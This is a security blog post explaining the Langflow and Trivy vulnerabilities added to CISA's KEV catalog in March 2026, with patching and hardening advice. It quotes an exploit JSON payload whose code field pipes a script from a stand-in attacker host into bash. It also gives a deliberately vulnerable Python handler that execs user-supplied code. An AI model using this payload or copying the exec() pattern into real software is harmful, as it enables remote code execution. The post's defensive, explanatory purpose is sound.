Your AI Toolchain Is Under Attack: Langflow and Trivy Hit CISA KEV in the Same Week

Petru Constantin
6 min read
#ai-security · #mlops · #supply-chain · #vulnerability-management

Two Tools, One Week, Zero Excuses

Between March 25 and March 26, 2026, CISA added two tools to its Known Exploited Vulnerabilities (KEV) catalog that most AI teams use daily: Langflow, the visual framework for building AI pipelines, and Trivy, the vulnerability scanner embedded in virtually every CI/CD pipeline that ships containers. Not the models. Not the training data. The tools you use to build and ship AI systems.

CVE-2026-33017 gave attackers unauthenticated remote code execution on any exposed Langflow instance. Exploitation started within 20 hours of disclosure. CVE-2026-33634 turned Trivy's official release infrastructure into a credential-stealing supply chain weapon after a threat actor called TeamPCP poisoned GitHub Actions, Docker Hub images, and release binaries simultaneously.

If your AI team runs Langflow for prototyping or Trivy for scanning, you had a window of about one day before attackers came knocking. That is the state of AI toolchain security in 2026.

Langflow: Same exec() Call, Twice

Here is the part that should worry you more than any single CVE: Langflow was hit through the same underlying pattern twice.

In May 2025, CVE-2025-3248 exploited Langflow's /api/v1/validate/code endpoint. The vulnerability? Python's exec() function running user-supplied code without authentication. CISA added it to KEV. Langflow patched it in version 1.3.0.

Ten months later, CVE-2026-33017 hit a different endpoint (/api/v1/build_public_tmp/{flow_id}/flow) with the same fundamental problem: attacker-controlled Python code executed server-side without sandboxing. CVSS 9.3. CISA KEV again.

And JFrog's security research team found that version 1.8.2, widely reported as patched, remains exploitable.

The pattern is clear: patching individual endpoints does not fix an architectural problem. When your application's core design involves executing arbitrary code from external input, every new feature creates a new attack surface. The fix for CVE-2025-3248 added authentication to one endpoint. It did not address the fact that the application's fundamental operation, building flows from user definitions, requires code execution.

# The pattern that keeps breaking Langflow:
# User-supplied flow data → AST parse → compile → exec()
# Authentication fixes one endpoint. The architecture stays vulnerable.
 
# What attackers sent to /api/v1/build_public_tmp/{flow_id}/flow:
{
  "nodes": [{
    "data": {
      "node": {
        "template": {
          "code": {
            "value": "__import__('os').system('curl attacker.com/shell.sh | bash')"
          }
        }
      }
    }
  }]
}
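The design flaw is easy to reproduce. Here is a minimal Python sketch of the pattern described above: a handler that lifts a code string out of a flow definition and hands it straight to exec(). This mirrors the pattern, not Langflow's actual source; the function name and payload shape are illustrative.

```python
import json

def run_flow_node(flow_json: str) -> dict:
    """Simulate the vulnerable handler: parse a flow, exec its code fields."""
    flow = json.loads(flow_json)
    namespace: dict = {}
    for node in flow["nodes"]:
        code = node["data"]["node"]["template"]["code"]["value"]
        # The core flaw: attacker-controlled text reaches exec() directly.
        exec(compile(code, "<flow>", "exec"), namespace)
    return namespace

# A benign payload shows the mechanics; swap in the string from the
# attack above and the server runs the attacker's shell command instead.
benign = json.dumps({"nodes": [{"data": {"node": {"template":
    {"code": {"value": "result = 6 * 7"}}}}}]})
```

Authentication in front of this handler changes who can reach it, not what it does. As long as the flow format carries executable code, any newly added endpoint that builds flows reopens the same hole.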

Trivy: Your Security Scanner Became the Threat

The Trivy compromise is a different kind of problem, and in some ways worse.

On March 19, 2026, TeamPCP force-pushed 76 of 77 version tags in aquasecurity/trivy-action to point at malicious commits. They published a trojaned Trivy v0.69.4 release. The payload ran before the legitimate scan, so pipelines looked normal while credentials were exfiltrated in the background.

The root cause? Credentials that were not fully revoked after a previous security incident. Aqua Security confirmed that earlier containment was incomplete, leaving residual access to release infrastructure.

Think about what Trivy has access to in a typical pipeline: cloud provider credentials, Kubernetes tokens, SSH keys, container registry auth, and every secret your CI/CD system touches. It runs on every PR, every merge, every deployment. Compromise the scanner, and you do not just get code. You get the keys to the entire infrastructure.

This was not theoretical. Kaspersky confirmed TeamPCP also targeted Checkmarx KICS and LiteLLM in the same campaign. Three developer tools, one coordinated operation.
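One concrete defense against a trojaned release is verifying artifacts against digests you recorded out of band, before the incident window. A hedged sketch, with helper names that are ours and not part of any Trivy tooling:

```python
import hashlib
import hmac

def sha256_hex(data: bytes) -> str:
    """SHA-256 digest of a release artifact, as lowercase hex."""
    return hashlib.sha256(data).hexdigest()

def verify_artifact(artifact: bytes, expected_hex: str) -> bool:
    """Compare against a known-good digest in constant time."""
    return hmac.compare_digest(sha256_hex(artifact), expected_hex.lower())
```

In practice you would read the binary from disk and take expected_hex from a checksums file you archived before March 19. A digest published alongside a compromised release proves nothing, since the attacker controls both.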

Why This Matters Beyond Patching

Most security teams treat AI tools like any other software: patch when there is a CVE, move on. That approach fails here for three reasons.

First, AI tools have architectural risk. Langflow, by design, executes code that users provide. LiteLLM routes prompts across providers, meaning it handles credentials for every LLM API you use. These tools are not incidentally dangerous. Their core function requires elevated privileges and code execution.

Second, the attack surface grows with every integration. Each new MCP server, each new LangChain tool, each RAG pipeline connector adds another surface where untrusted input meets code execution. The OpenClaw crisis confirmed this: one in five packages in the ClawHub registry were malicious. AI agent ecosystems are repeating the npm/PyPI supply chain mistakes, but with tools that have far more access.

Third, your compliance obligations cover this. The EU AI Act Article 15 requires high-risk AI systems to be "resilient against attempts by unauthorised third parties to alter their use, outputs or performance by exploiting system vulnerabilities." A Langflow instance building your production AI pipeline that is exploitable via unauthenticated HTTP is not resilient. A Trivy scanner exfiltrating credentials from your deployment pipeline is not robust. These are not edge cases for compliance officers to dismiss. They are exactly the scenarios Article 15 was written to prevent.

What to Do About It This Week

If you run Langflow: upgrade to version 1.9.0 or later. Do not trust 1.8.2. Audit whether any Langflow instance is exposed to the internet without authentication. If it is, assume it was compromised and rotate any credentials it had access to.
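Auditing exposure can start with a simple unauthenticated probe. The sketch below targets the endpoint path cited for CVE-2025-3248 and maps the HTTP response status to a verdict; the path constant and the status classification are our assumptions, so adapt both to your deployment.

```python
from urllib import request, error

# Endpoint from CVE-2025-3248; adjust for your Langflow version.
VULNERABLE_PATH = "/api/v1/validate/code"

def classify_status(status: int) -> str:
    """Map the status of an unauthenticated probe to a rough verdict."""
    if status in (401, 403):
        return "auth-required"   # endpoint refuses anonymous callers
    if status in (200, 422):
        return "exposed"         # endpoint processed the request
    return "inconclusive"

def probe(base_url: str) -> str:
    """POST a harmless snippet without credentials and classify the reply."""
    req = request.Request(
        base_url.rstrip("/") + VULNERABLE_PATH,
        data=b'{"code": "1+1"}',
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with request.urlopen(req, timeout=5) as resp:
            return classify_status(resp.status)
    except error.HTTPError as e:
        return classify_status(e.code)
```

An "exposed" verdict means the instance processed an anonymous request to a code-handling endpoint: treat it as compromised and rotate its credentials, per the guidance above.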

If you run Trivy: pin to v0.69.3 or earlier. Check your trivy-action commit SHA against the known-good hashes. Rotate any secrets that were available to CI/CD pipelines between March 19 and March 26.

Beyond the immediate patches:

  1. Inventory your AI toolchain. List every tool in your AI development and deployment pipeline. Langflow, LangChain, LlamaIndex, vLLM, Trivy, whatever you use. Know what each tool has access to.
  2. Pin dependencies by hash, not tag. Mutable tags are what made the Trivy attack possible. Pin GitHub Actions by commit SHA. Pin container images by digest.
  3. Isolate AI dev tools from production secrets. Your prototyping environment should not have access to production credentials. Langflow instances for experimentation should run in sandboxed environments with no network egress.
  4. Monitor for unusual outbound traffic from CI/CD runners. The Trivy payload called home to exfiltrate credentials. Network monitoring on your build infrastructure would have caught this.

The Toolchain Is the New Perimeter

We spent years securing models against prompt injection and adversarial inputs. That work matters. But while we were focused on the model layer, attackers went after the infrastructure underneath: the tools that build, test, scan, and deploy AI systems.

Two CISA KEV entries in one week, both targeting AI development tools, is not a coincidence. It is a pattern. The next Langflow or Trivy is already in your pipeline. The question is whether you will find it before an attacker does.

If you are building AI systems in production and have not audited the security posture of your development tools, that is the first thing to fix. Not next quarter. This week.


About DeviDevs: We build ML platforms, secure AI systems, and help companies comply with the EU AI Act. devidevs.com
